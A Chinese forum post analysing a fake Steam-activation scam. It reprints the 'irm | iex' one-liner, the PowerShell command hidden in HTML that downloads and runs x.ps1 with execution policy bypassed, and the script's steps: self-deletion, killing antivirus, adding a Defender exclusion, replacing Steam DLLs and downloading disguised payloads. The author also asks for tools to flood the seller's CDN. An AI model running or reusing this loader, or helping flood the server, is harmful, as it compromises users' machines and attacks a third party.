steam 假激活的玩意分析

pdd 店家假激活要求输入这个命令

irm steam.*** | iex 

尝试浏览器直接访问这个 steam 网站，直接跳转到了真 steam 思路错误 然后把管道符号|去掉 发现拉去的还是 html ，发现有些不对，于是把

irm steam.*** 

的玩意全部一股脑扔进 vscode 然后折叠 html 发现了这个玩意

 #> irm steam.***/pwsDwFile/new -OutFile x.ps1 powershell.exe -ExecutionPolicy Bypass -File x.ps1; <# 

使用 powershell 绕过执行策略的限制 这里我最开始没发现问题，看了半天 html 都快傻眼了，代码还能混淆进 html ？最后反向思考肯定得用 powershell 才能执行接下来的脚本，于是搜搜 powershell 关键字给我找出来上面那两玩意，前面那句居然是藏在 html 里面的，后面那句没有隐藏，vscode 折叠一下就看见 powershell 了 继续跟进 x.ps1

cls $filePathToDelete = Join-Path $env:USERPROFILE "x.ps1" if (Test-Path $filePathToDelete) { Remove-Item -Path $filePathToDelete } $desktopFilePathToDelete = Join-Path ([System.Environment]::GetFolderPath('Desktop')) "x.ps1" if (Test-Path $desktopFilePathToDelete) { Remove-Item -Path $desktopFilePathToDelete } 

把自己删了

$steamRegPath = 'HKCU:\Software\Valve\Steam' 

搜搜 steam

$localPath = -join ($env:LOCALAPPDATA,"\SteamActive") if ((Test-Path $steamRegPath)) { $properties = Get-ItemProperty -Path $steamRegPath if ($properties.PSObject.Properties.Name -contains 'SteamPath') { $steamPath = $properties.SteamPath } } 

让用户关掉授权

if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Write-Host "[请重新打开 Power shell 打开方式以管理员身份运行]" -ForegroundColor:red exit } function PwStart() { if(Get-Process "360Tray*" -ErrorAction Stop){ while(Get-Process 360Tray* -ErrorAction Stop){ Write-Host "[请先退出 360 安全卫士]" -ForegroundColor:Red Start-Sleep 1.5 } PwStart } if(Get-Process "360sd*" -ErrorAction Stop) { while(Get-Process 360sd* -ErrorAction Stop){ Write-Host "[请先退出 360 杀毒]" -ForegroundColor:Red Start-Sleep 1.5 } PwStart } 

这句话很奇怪，实际上虚拟机里面没有 steam 并没有执行？

 if ($steamPath -eq ""){ Write-Host "[请检查您的 Steam 是否正确安装]" -ForegroundColor:Red exit } 

关掉 steam

 Write-Host "[ServerStart OK]" -ForegroundColor:green Stop-Process -Name steam* -Force -ErrorAction Stop Start-Sleep 2 if(Get-Process steam* -ErrorAction Stop){ TASKKILL /F /IM "steam.exe" | Out-Null Start-Sleep 2 } if (!(Test-Path $localPath)) { md $localPath | Out-Null if (!(Test-Path $localPath)) { New-Item $localPath -ItemType directory -Force | Out-Null } } $catchPath = -join ($steamPath,"\package\data") if ((Test-Path $catchPath)) { if ((Test-Path $catchPath)) { Remove-Item $catchPath -Recurse -Force | Out-Null } } 

添加免杀

 try{ Add-MpPreference -ExclusionPath $steamPath -ErrorAction Stop Start-Sleep 3 }catch{} Write-Host "[Result->0 OK]" -ForegroundColor:green 

删掉其他家的 dll ？

 try{ $d = $steamPath + "/version.dll" if (Test-Path $d) { Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件 } $d = $steamPath + "/user32.dll" if (Test-Path $d) { Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件 } $d = $steamPath + "/hid.dll" if (Test-Path $d) { Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件 } }catch{ Write-Host "[异常残留请检查[$d]文件是否异常!]" -ForegroundColor:red exit } 

下 pdf 假装？话说老哥们有啥可以刷网络的工具么，其实我有点想刷上一波把他 cdn 刷干净，但是限速 2m 并且单 ip 限 1 个线程

 $downloadData = "http://steam.***/pwsDwFile/bcfc1e52ca77ad82122dfe4c9560f3ec.pdf" $downloadLink = "http://steam.***/pwsDwFile/9b96dab2bb0ba18d56068fabc5b17185.pdf" irm -Uri $downloadLink -OutFile $d -ErrorAction Stop Write-Host "[Result->1 OK]" -ForegroundColor:green $d = $localPath + "/hid" irm -Uri $downloadData -OutFile $d -ErrorAction Stop Write-Host "[Result->2 OK]" -ForegroundColor:green Start-Sleep 1 

重新打开 steam

 Start steam:// Write-Host "[连接服务器成功请在 Steam 输入激活码 3 秒后自动关闭]" -ForegroundColor:green Start-Sleep 3 exit | } 

整体看下来就是给 steam 添加了两个文件，可是看起来并没有进行注入什么的啊，我理解就需要 dll 时候是先拉文件目录内的 dll 进行执行？这样才能解释为啥就是只添加了两个文件？